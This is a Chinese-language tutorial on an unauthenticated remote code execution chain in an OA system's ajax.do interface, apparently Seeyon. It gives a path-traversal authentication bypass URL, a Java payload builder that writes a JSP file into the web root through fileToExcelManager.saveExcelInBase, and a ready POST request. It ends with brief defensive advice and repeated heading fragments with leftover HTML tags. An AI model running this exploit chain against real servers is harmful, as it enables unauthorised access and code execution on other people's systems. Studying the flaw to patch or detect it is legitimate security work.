OA系统ajax.do漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
本漏洞存在于某OA系统的`ajax.do<\/code>接口，该接口允许调用系统内部其他类的方法。通过特定的URL构造可以绕过权限验证，进而实现未授权访问和远程代码执行。<\/p>`

漏洞分析<\/h2>
1. 权限绕过机制<\/h3>
1.1 安全过滤流程<\/h4>

所有.do<\/code>结尾的请求都会经过SecurityFilter<\/code>和CTPSecurityFilter<\/code>的校验<\/li>
isSpringController<\/code>方法校验规则：

以.do<\/code>结尾的URL返回true<\/li>
包含.do;jsessionid<\/code>的URL返回true<\/li>
<\/ul>
<\/li>
<\/ol>
1.2 认证绕过原理<\/h4>


SpringControllerAuthenticator#authenticate<\/code>方法流程：<\/p>

检查是否登录<\/li>
未登录时调用isNeedlessCheckLogin<\/code>方法<\/li>
对于\/ajax.do<\/code>请求，accessUrl<\/code>被设置为managerName<\/code>参数值（默认为null）<\/li>
检查accessUrl<\/code>是否在needlessUrlMap<\/code>中<\/li>
当accessUrl<\/code>为null时会抛出异常<\/li>
<\/ul>
<\/li>

绕过技巧：<\/p>

利用Spring的alwaysUseFullPath=false<\/code>特性<\/li>
getPathWithinServletMapping<\/code>会对URI进行标准化处理（解码、处理跨目录等）<\/li>
构造如\/main.do\/..\/ajax.do<\/code>的路径可以绕过验证<\/li>
<\/ul>
<\/li>
<\/ol>
1.3 最终绕过方案<\/h4>
发现autoinstall.do<\/code>在needlessUrlMap<\/code>中且包含*<\/code>通配符，因此可以使用：<\/p>
\/autoinstall.do\/..\/ajax.do?method=ajaxAction&managerName=constDefManager&managerMethod=listPage
<\/code><\/pre>
2. ajax.do调用机制<\/h3>
2.1 调用流程<\/h4>

\/ajax.do<\/code>对应com.seeyon.ctp.common.service.AjaxController<\/code>类<\/li>
主要逻辑在ajaxAction<\/code>方法中：

调用invokeService<\/code>方法处理请求<\/li>
如果传入ClientRequestPath<\/code>参数且不在黑名单中，会调用ZipUtil.compressResponse<\/code>解压缩<\/li>
<\/ul>
<\/li>
<\/ol>
2.2 invokeService方法分析<\/h4>


获取参数：<\/p>

serviceName<\/code>：要调用的服务名<\/li>
methodName<\/code>：方法名<\/li>
strArgs<\/code>：参数<\/li>
compressType<\/code>：压缩类型<\/li>
<\/ul>
<\/li>

根据compressType<\/code>调用ZipUtil.uncompressRequest<\/code>处理strArgs<\/code>：<\/p>

gzip<\/code>类型会进行gzip解压缩<\/li>
其他类型返回原始数据<\/li>
<\/ul>
<\/li>

通过getService<\/code>方法获取服务对象：<\/p>

从beanCacheMap<\/code>中获取缓存的对象<\/li>
检查对象是否继承DataSource<\/code>、Session<\/code>或SessionFactory<\/code>类<\/li>
<\/ul>
<\/li>

调用invokeMethod<\/code>方法反射执行目标方法<\/p>
<\/li>
<\/ol>
2.3 方法查找与调用<\/h4>


judgeCandidate<\/code>方法：<\/p>

反射获取服务对象的所有方法<\/li>
匹配方法名和参数个数<\/li>
将匹配的方法加入列表返回<\/li>
<\/ul>
<\/li>

findMethodAndArgs<\/code>方法：<\/p>

从候选方法中找到具体要调用的方法<\/li>
返回Method<\/code>对象和参数<\/li>
<\/ul>
<\/li>

反射调用目标方法<\/p>
<\/li>
<\/ol>
漏洞利用<\/h2>
1. 利用fileToExcelManager实现RCE<\/h3>
fileToExcelManager<\/code>的saveExcelInBase<\/code>方法存在文件上传漏洞，可导致远程代码执行。<\/p>
1.1 漏洞点分析<\/h4>


saveExcelInBase<\/code>方法接受3个参数：<\/p>

文件路径<\/li>
文件名<\/li>
文件内容<\/li>
<\/ul>
<\/li>

写入文件时会在内容前后添加双引号，直接插入shell代码会被破坏<\/p>
<\/li>
<\/ol>
1.2 绕过技巧<\/h4>
利用换行符和双引号闭合前后的双引号：<\/p>
"\"\r\n"<\/span> +<\/span> "<% out.println(\"ttttttttt\ + "<\/span>\<\/span>"\r\n"<\/span>
<\/span><\/span><\/code><\/pre>1.3 利用代码示例<\/h4>
import<\/span> com.seeyon.ctp.common.excel.DataRecord;<\/span>
<\/span><\/span>import<\/span> com.seeyon.ctp.common.log.CtpLogFactory;<\/span>
<\/span><\/span>import<\/span> com.seeyon.ctp.util.ZipUtil;<\/span>
<\/span><\/span>import<\/span> com.seeyon.ctp.util.json.JSONUtil;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.logging.Log;<\/span>
<\/span><\/span>import<\/span> java.net.URLEncoder;<\/span>
<\/span><\/span>import<\/span> java.util.ArrayList;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> fileToExcelManagerPayload<\/span> {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> Log LOGGER =<\/span> CtpLogFactory.<\/span>getLog<\/span>(<\/span>fileToExcelManagerPayload.<\/span>class<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        DataRecord d =<\/span> new<\/span> DataRecord();<\/span>
<\/span><\/span>        String[]<\/span> c =<\/span> {<\/span>
<\/span><\/span>            "\"\r\n"<\/span> +<\/span>
<\/span><\/span>            "<% out.println(\"ttttttttt\""<\/span> +<\/span>
<\/span><\/span>            "\"\r\n"<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        d.<\/span>setColumnName<\/span>(<\/span>c);<\/span>
<\/span><\/span>        
<\/span><\/span>        String dd =<\/span> JSONUtil.<\/span>toJSONString<\/span>(<\/span>d);<\/span>
<\/span><\/span>        final<\/span> ArrayList<<\/span>Object><\/span> list =<\/span> new<\/span> ArrayList<>();<\/span>
<\/span><\/span>        list.<\/span>add<\/span>(<\/span>"..\/webapps\/ROOT\/x.jsp"<\/span>);<\/span>
<\/span><\/span>        list.<\/span>add<\/span>(<\/span>"\"\""<\/span>);<\/span>
<\/span><\/span>        list.<\/span>add<\/span>(<\/span>d);<\/span>
<\/span><\/span>        
<\/span><\/span>        final<\/span> String list1 =<\/span> JSONUtil.<\/span>toJSONString<\/span>(<\/span>list);<\/span>
<\/span><\/span>        String strArgs =<\/span> ZipUtil.<\/span>compressResponse<\/span>(<\/span>list1,<\/span> "gzip"<\/span>,<\/span> "UTF-8"<\/span>,<\/span> LOGGER);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>URLEncoder.<\/span>encode<\/span>(<\/span>strArgs));<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"end"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>1.4 利用请求示例<\/h4>
POST \/seeyon\/autoinstall.do\/..\/ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP\/1.1
Host: target
Accept: *\/*
Accept-Encoding: gzip, deflate
Content-Type: application\/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 6357

managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&requestCompress=gzip&arguments=<压缩后的参数>
<\/code><\/pre>
防御建议<\/h2>

升级到最新版本，修复权限绕过漏洞<\/li>
对ajax.do<\/code>接口增加严格的权限控制<\/li>
对文件上传操作进行严格的路径和内容检查<\/li>
设置alwaysUseFullPath=true<\/code>避免路径标准化导致的绕过<\/li>
对反射调用方法进行白名单限制<\/li>
<\/ol>

OA系统ajax.do漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> 本漏洞存在于某OA系统的ajax.do<\/code>接口，该接口允许调用系统内部其他类的方法。通过特定的URL构造可以绕过权限验证，进而实现未授权访问和远程代码执行。<\/p>

1. 权限绕过机制<\/h3>

2. ajax.do调用机制<\/h3>

漏洞利用<\/h2>

1. 利用fileToExcelManager实现RCE<\/h3> fileToExcelManager<\/code>的saveExcelInBase<\/code>方法存在文件上传漏洞，可导致远程代码执行。<\/p>

漏洞概述<\/h2>
本漏洞存在于某OA系统的`ajax.do<\/code>接口，该接口允许调用系统内部其他类的方法。通过特定的URL构造可以绕过权限验证，进而实现未授权访问和远程代码执行。<\/p>`

1. 利用fileToExcelManager实现RCE<\/h3>
`fileToExcelManager<\/code>的saveExcelInBase<\/code>方法存在文件上传漏洞，可导致远程代码执行。<\/p>`